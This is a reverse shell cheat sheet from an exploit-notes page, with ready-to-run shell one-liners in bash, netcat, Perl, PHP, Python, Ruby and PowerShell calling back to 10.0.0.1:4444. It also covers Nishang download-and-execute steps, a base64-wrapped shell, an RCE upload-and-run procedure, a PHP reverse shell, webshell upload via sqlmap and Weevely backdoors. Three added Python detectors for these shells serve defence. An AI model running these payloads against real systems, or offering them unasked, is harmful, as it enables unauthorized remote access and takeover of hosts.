Exploit Notes

Reverse Shell Cheat Sheet

Last modified: 2023-03-10

Tags: Privilege Escalation, Reverse Shell, Windows

Preparation

First of all, we need to start a listener on the local machine to receive the incoming connection.

nc -lvnp 4444

Cheat Sheets

Bash

bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'
/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'

# For URL param
bash+-i+>%26+/dev/tcp/10.0.0.1/4444+0>%261

Netcat OpenBSD

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f

Ncat

ncat 10.0.0.1 4444 -e /bin/bash
ncat 10.0.0.1 4444 -e /bin/sh
ncat 10.0.0.1 4444 -c bash
ncat --udp 10.0.0.1 4444 -e /bin/bash

nc 10.0.0.1 4444 -e /bin/bash
nc 10.0.0.1 4444 -e /bin/sh
nc 10.0.0.1 4444 -c bash
nc --udp 10.0.0.1 4444 -e /bin/bash

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  • Script File

    To run the same code from a file instead of a one-liner, create a Perl script as follows.

    # shell.pl
    use Socket;
    $i="10.0.0.1";
    $p=4444;
    socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
    if(connect(S,sockaddr_in($p,inet_aton($i)))){
        open(STDIN,">&S");
        open(STDOUT,">&S");
        open(STDERR,">&S");
        exec("/bin/sh -i");
    };

    Then run it with perl.

    perl ./shell.pl

PHP

php -r '$sock=fsockopen("10.0.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Python

python -c 'import socket,os,pty;s=socket.socket();s.connect(("10.0.0.1", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("10.0.0.1", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
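The Python one-liners above (like the bash `/dev/tcp` form) work by binding file descriptors 0, 1 and 2 to the connected socket with `os.dup2`, which leaves a very specific trace on a Linux host: a process whose three standard streams all resolve to the same `socket:[inode]` link under `/proc/<pid>/fd`. The following example is added here and is not part of the original cheat sheet; it checks for exactly that artifact. `SAMPLE_FD_TABLE` is constructed data (made-up pids and inode numbers) so the logic can be exercised without a live reverse shell, and `read_proc_fd_table` collects the same shape from a real `/proc`.

```python
import os
import re
from typing import Dict, List

# Constructed example of what os.readlink("/proc/<pid>/fd/<n>") returns for
# fds 0-2 of three processes (pids and inode numbers are made up). pid 5678 is
# the shape a reverse shell leaves behind: stdin, stdout and stderr all
# dup2()'d onto one socket inode.
SAMPLE_FD_TABLE: Dict[int, Dict[int, str]] = {
    1234: {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"},             # interactive shell on a pty
    5678: {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"},  # stdio redirected to a socket
    9012: {0: "/dev/null", 1: "pipe:[771]", 2: "socket:[99]"},              # daemon with only stderr on a socket
}

SOCKET_LINK = re.compile(r"^socket:\[\d+\]$")


def stdio_on_socket(fds: Dict[int, str]) -> bool:
    """True when fds 0, 1 and 2 all point at the same socket inode."""
    targets = [fds.get(n) for n in (0, 1, 2)]
    if any(t is None for t in targets):
        return False
    return all(SOCKET_LINK.match(t) for t in targets) and len(set(targets)) == 1


def suspicious_pids(fd_table: Dict[int, Dict[int, str]]) -> List[int]:
    """Return the pids whose standard streams are all bound to one socket."""
    return sorted(pid for pid, fds in fd_table.items() if stdio_on_socket(fds))


def read_proc_fd_table() -> Dict[int, Dict[int, str]]:
    """Collect fd 0-2 link targets for every process we may inspect (Linux /proc only).

    Other users' processes are only readable as root, so run this with enough
    privilege to see the web server and service accounts.
    """
    table: Dict[int, Dict[int, str]] = {}
    if not os.path.isdir("/proc"):
        return table
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        fds: Dict[int, str] = {}
        for n in (0, 1, 2):
            try:
                fds[n] = os.readlink(f"/proc/{entry}/fd/{n}")
            except OSError:  # process exited, or no permission to read its fds
                continue
        table[int(entry)] = fds
    return table


if __name__ == "__main__":
    print("sample table ->", suspicious_pids(SAMPLE_FD_TABLE))
    for pid in suspicious_pids(read_proc_fd_table()):
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmd = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except OSError:
            cmd = "?"
        print(f"pid {pid}: stdio on a socket: {cmd}")
```

A hit is a triage lead rather than proof: inetd-style and socket-activated services legitimately run with their stdio on a socket, so check the command line and parent process. When the one-liner ends in `pty.spawn("bash")`, the spawned bash sits on a pty, but the parent python process still holds the socket on fds 0 to 2 and is the one that shows up.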

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

PowerShell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("10.0.0.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Nishang

Nishang is a collection of offensive PowerShell scripts for red teaming, penetration testing and offensive security.

  1. Preparing the Payload in Your Local Machine

    First off, copy the payload to the current working directory.

    cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 .
    mv Invoke-PowerShellTcp.ps1 shell.ps1
    

    Append the following line to the end of the payload (shell.ps1).

    Invoke-PowerShellTcp -Reverse -IPAddress <your-local-ip> -Port 4444
    
  2. Opening a Web Server in Your Local Machine

    So that the target machine can download the payload and execute the reverse shell, start a web server on your local machine.

    python3 -m http.server 8000
    
  3. Downloading the Payload and Executing Reverse Shell

    On the target machine, download the locally hosted payload and run the reverse shell.

    cmd /c powershell IEX (New-Object Net.WebClient).DownloadString('http://<your-local-ip>:8000/shell.ps1')
    

Reverse Shell with Base64

First, base64-encode the command that starts the reverse shell.

echo -n 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1' | base64

Then copy the base64 text and paste it into the following command.

echo -n "<Base64>" | base64 -d | bash
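Every entry in the cheat sheets above is a single command line, so process-creation telemetry (auditd execve records, EDR process events) is the natural place to detect them, and the base64 wrapper in this section only hides the payload until the blob is decoded. The following Python example is added here and is not part of the original page: it carries a small rule set derived from the one-liners above, finds any `<blob> | base64 -d` fragment, decodes it and re-applies the rules to the plaintext. The events in `SAMPLE_EVENTS` are constructed (pids and user names are made up; the command lines copy the cheat sheet), and the event shape is an assumption, not a particular product's schema.

```python
import base64
import binascii
import re
from typing import Dict, List, Tuple

# Patterns lifted from the one-liners in this cheat sheet; each names the
# artifact a process-creation log would show.
RULES: List[Tuple[str, re.Pattern]] = [
    ("bash_dev_tcp",         re.compile(r"/dev/(tcp|udp)/")),
    ("netcat_exec",          re.compile(r"\b(nc|ncat|netcat)\b.*\s-[ce]\s+\S*(ba)?sh\b")),
    ("mkfifo_pipe_to_nc",    re.compile(r"mkfifo\b.*\|\s*(nc|ncat|netcat)\b")),
    ("python_socket_dup2",   re.compile(r"socket\.socket\(.*dup2\(")),
    ("perl_socket_exec",     re.compile(r"\bperl\b.*\bSocket\b.*\bexec\(")),
    ("php_fsockopen_exec",   re.compile(r"fsockopen\(.*\bexec\(")),
    ("ruby_tcpsocket_exec",  re.compile(r"TCPSocket\.open\(.*\bexec\b")),
    ("powershell_tcpclient", re.compile(r"(?i)Net\.Sockets\.TCPClient\(.*GetStream\(")),
]

# "<base64 blob> | base64 -d" (or --decode): the wrapper from the section above.
B64_DECODE = re.compile(r"([A-Za-z0-9+/]{16,}={0,2})\s*\|\s*base64\s+(?:-d|--decode)\b")


def decode_embedded_base64(cmd: str) -> List[str]:
    """Plaintext of every base64 blob that the command line pipes into base64 -d."""
    decoded = []
    for m in B64_DECODE.finditer(cmd):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue  # not valid base64 after all
    return decoded


def analyze(cmd: str) -> List[str]:
    """Names of the rules matching the command line; 'b64:' marks hits found only after decoding."""
    hits = [name for name, rx in RULES if rx.search(cmd)]
    for plaintext in decode_embedded_base64(cmd):
        hits += ["b64:" + name for name, rx in RULES if rx.search(plaintext)]
    return hits


def scan(events: List[Dict]) -> List[Dict]:
    """Run analyze() over process events and keep the ones with at least one hit."""
    findings = []
    for ev in events:
        rules = analyze(ev["cmd"])
        if rules:
            findings.append({"pid": ev["pid"], "user": ev["user"], "rules": rules,
                             "decoded": decode_embedded_base64(ev["cmd"])})
    return findings


# Constructed sample process-creation events; pids and users are made up. The
# base64 blob is built here rather than pasted so it is guaranteed to decode
# to the bash one-liner from the Base64 section.
_B64_PAYLOAD = base64.b64encode(b"bash -i >& /dev/tcp/10.0.0.1/4444 0>&1").decode()
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 101, "user": "www-data", "cmd": "bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'"},
    {"pid": 102, "user": "alice",    "cmd": "python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"10.0.0.1\", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"bash\")'"},
    # truncated after GetStream(); the rule needs only this prefix
    {"pid": 103, "user": "SYSTEM",   "cmd": "powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4444);$stream = $client.GetStream();"},
    {"pid": 104, "user": "www-data", "cmd": f"sh -c 'echo -n {_B64_PAYLOAD} | base64 -d | bash'"},
    {"pid": 105, "user": "www-data", "cmd": "nc 10.0.0.1 4444 -e /bin/sh"},
    {"pid": 106, "user": "bob",      "cmd": "nc -lvnp 8080"},               # a listener: not matched by these rules
    {"pid": 107, "user": "alice",    "cmd": "python3 -m http.server 8000"},  # benign
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"pid {f['pid']} ({f['user']}): {', '.join(f['rules'])}")
        for p in f["decoded"]:
            print("   decoded:", p)
```

The rules are deliberately literal to the forms on this page; in production they belong in the telemetry pipeline's own rule language, and the decode step is what keeps the base64 variant from slipping past a plain string match.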

Reverse Shell over Websites

Shell Script & Remote Code Execution (RCE)

If we find a website that is vulnerable to Remote Code Execution but cannot get a reverse shell from it directly, we may be able to get one by uploading a script.

  1. Create a shell script that opens the reverse shell.

    This file is named "revshell.sh".

    #!/bin/bash
    bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1
    
  2. Upload the script to the website

    Start a web server on the local machine to serve the script.

    python3 -m http.server 8000
    

    Then fetch it through the remote code execution on the target website.

    https://vulnerable.com/?cmd=wget http://<local-ip>:8000/revshell.sh
    # or
    https://vulnerable.com/?cmd=curl <local-ip>:8000/revshell.sh
    

    To confirm that the script was uploaded, execute the following via RCE.

    https://vulnerable.com/?cmd=ls
    
  3. Get a shell

    Start a listener on the local machine to catch the shell.

    nc -lvnp 4444
    

    Now execute the uploaded script via RCE.

    # 1. Change permission for the script
    https://vulnerable.com/?cmd=chmod 777 revshell.sh
    # 2. Execute the script
    https://vulnerable.com/?cmd=./revshell.sh
    

    We should now have a shell on the target.
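Seen from the web server, the procedure above leaves a recognizable trail in the access log: a request whose injected parameter fetches a file with wget or curl, followed by a chmod and then an execution of that file, all from the same client. The following Python example, added here and not part of the original page, parses combined-format access-log lines, percent-decodes the `cmd` parameter (the parameter name is assumed from the URLs above) and alerts on any client that goes through the three stages in order. The log lines are constructed; the client and attacker-host addresses are documentation-range values chosen for the example.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined log format; addresses and
# timestamps are made up). The 203.0.113.7 requests replay the
# wget -> chmod -> execute sequence from the steps above; the last line is
# ordinary traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2023:12:00:01 +0000] "GET /?cmd=id HTTP/1.1" 200 55 "-" "curl/7.88.1"
203.0.113.7 - - [10/Mar/2023:12:00:09 +0000] "GET /?cmd=wget%20http%3A%2F%2F198.51.100.5%3A8000%2Frevshell.sh HTTP/1.1" 200 0 "-" "curl/7.88.1"
203.0.113.7 - - [10/Mar/2023:12:00:15 +0000] "GET /?cmd=ls HTTP/1.1" 200 120 "-" "curl/7.88.1"
203.0.113.7 - - [10/Mar/2023:12:00:21 +0000] "GET /?cmd=chmod%20777%20revshell.sh HTTP/1.1" 200 0 "-" "curl/7.88.1"
203.0.113.7 - - [10/Mar/2023:12:00:25 +0000] "GET /?cmd=.%2Frevshell.sh HTTP/1.1" 200 0 "-" "curl/7.88.1"
198.51.100.23 - - [10/Mar/2023:12:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The three stages of the upload-and-run procedure, matched against the
# percent-decoded value of the injected command parameter.
STAGES = [
    ("fetch",   re.compile(r"^\s*(wget|curl)\b")),
    ("chmod",   re.compile(r"^\s*chmod\b")),
    ("execute", re.compile(r"^\s*(\./\S+|(ba)?sh\s+\S+)")),
]
CMD_PARAM = "cmd"  # assumption: the vulnerable parameter is named cmd, as in the URLs above


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line; 'cmd' holds the decoded command parameter, or '' if absent."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    cmd = parse_qs(query).get(CMD_PARAM, [""])[0]   # parse_qs percent-decodes the value
    return {"ip": m.group("ip"), "ts": m.group("ts"), "target": m.group("target"), "cmd": cmd}


def classify(cmd: str) -> Optional[str]:
    """Map a decoded command to a stage name, or None when it is none of the three."""
    for name, rx in STAGES:
        if rx.search(cmd):
            return name
    return None


def stages_by_ip(lines: List[str]) -> Dict[str, List[str]]:
    """Ordered list of observed stages per client address."""
    seen: Dict[str, List[str]] = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["cmd"]:
            stage = classify(rec["cmd"])
            if stage:
                seen[rec["ip"]].append(stage)
    return dict(seen)


def _is_subsequence(needle: List[str], hay: List[str]) -> bool:
    it = iter(hay)  # consumed progressively, so order is enforced
    return all(any(x == y for y in it) for x in needle)


def alert_ips(lines: List[str]) -> List[str]:
    """Clients that performed fetch, then chmod, then execute, in that order."""
    return sorted(ip for ip, st in stages_by_ip(lines).items()
                  if _is_subsequence(["fetch", "chmod", "execute"], st))


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for rec in filter(None, map(parse_line, lines)):
        if rec["cmd"]:
            print(f"{rec['ip']} {rec['ts']} cmd={rec['cmd']!r} -> {classify(rec['cmd'])}")
    print("staged upload-and-run from:", alert_ips(lines))
```

Any request carrying a command in a query parameter is already worth an alert on its own; the staged check is for prioritising, since a client that completes all three steps has very likely obtained a shell, and the fetch stage also tells you which external host served the script.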

PHP Reverse Shell

php-reverse-shell is an awesome payload against a website using PHP.

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php

# Edit $ip and $port to your local ip:port in the payload

Update `$ip` and `$port` in the payload to your local IP and port.
Then upload the payload (or paste its content into a PHP file on the target website directly) and load the page.

PHP Reverse Shell (without fsockopen, and for FreeBSD)

<?php
set_time_limit (0);
$ip = '10.0.0.1';  // CHANGE THIS
$port = 4444;      // CHANGE THIS

// Spawn shell process
$descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
    2 => array("file", "/tmp/error-output.txt", "a")  // stderr is appended to a file
);

$cwd = "/tmp";
$env = array('some_option' => 'aeiou');  // environment passed to the child process

$process = proc_open('sh', $descriptorspec, $pipes, $cwd, $env);

if (is_resource($process)) {
    // Double quotes so that $ip and $port are interpolated into the command
    fwrite($pipes[0], "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip $port >/tmp/f");
    fclose($pipes[0]);

    echo stream_get_contents($pipes[1]);
    fclose($pipes[1]);

    $return_value = proc_close($process);
    echo "command returned $return_value\n";
}
?>

PHP Reverse Shell for Windows

We can get the payload here.

Upload the Payload using SQLi

# req.txt: The request settings file which is saved using Burp Suite
sqlmap -r req.txt --dbs --random-agent --batch --file-dest=/var/www/html/shell.php --file-write=./shell.php

Useful Tools

  • Weevely3

    A web shell generator.

    1. Generate Backdoor with Password

      A password is required.

      weevely generate <password> ./shell.php
      
    2. Upload the Payload to Target Website and Execute Commands

      weevely https://vulnerable.com/upload/shell.php <password> whoami
      
    3. Get a Shell

      weevely https://vulnerable.com/upload/shell.php <password>
      

Pwncat

Pwncat is a reverse and bind shell handler.

To listen for the incoming connection, run the following command.

pwncat-cs -lp 4444

Commands in Pwncat Shell

After the reverse connection is established, we can run commands either locally or on the remote host.

# Switch between Local and Remote shell
Ctrl+D

# Upload a file to target machine (e.g. upload example.txt from local to remote)
(local) upload ./example.txt /tmp/example.txt

Upgrade to a Full Functional Shell

After connecting to the target with a reverse shell, it's recommended to upgrade it to a more usable shell.

SHELL=/bin/bash script -q /dev/null
# or
python3 -c 'import pty; pty.spawn("/bin/bash")'

The following steps improve the shell further by giving it proper terminal handling.

Ctrl+z
stty raw -echo;fg
Enter x2
export TERM=xterm
